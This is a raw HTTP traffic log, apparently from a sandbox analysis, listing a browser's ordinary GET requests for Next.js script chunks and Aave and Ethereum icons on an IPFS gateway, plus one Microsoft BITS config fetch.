Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4787.c9a9f6a64640a9a2.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1811.1d478527d9c58149.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9671.96a31e2ffa610a87.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8882.78d4e9d7872de2c1.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3866.777e7d128e9a4375.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7828.bc42be26a9e94bb7.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9189.3b39e44e1e1f285d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/797.224fdb0a57599ef0.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1320.f9a83bb87b7294af.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7603.58cb27010e0a12d8.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7888.4670beb870221fb5.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /aaveLogo.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /icons/networks/ethereum.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1226.2b4574c57c2b36b6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8701.d52e3ab5e2f5c410.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6504.d2701b5d1c9eba02.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4700.1016c158c2995fc4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/29107295.4a69275373f23f88.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6782.5dfef7893dd5bea4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3652.76d2fc48524771f4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9689.adbfca89f0e04259.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1497.8e36954048946218.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/330.182af63f38cc0e3d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8977.8cefff53c53bdda4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7978-570f194bf991f35f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9522.ed3f6cd8a99af04d.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-7cee0530881530e6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-79bce4a3a540b080.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-37e08f82b0681cde.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-c0d18763a38243f4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8420.5efc2099f7e56f19.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1506-405d1202a4254f54.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
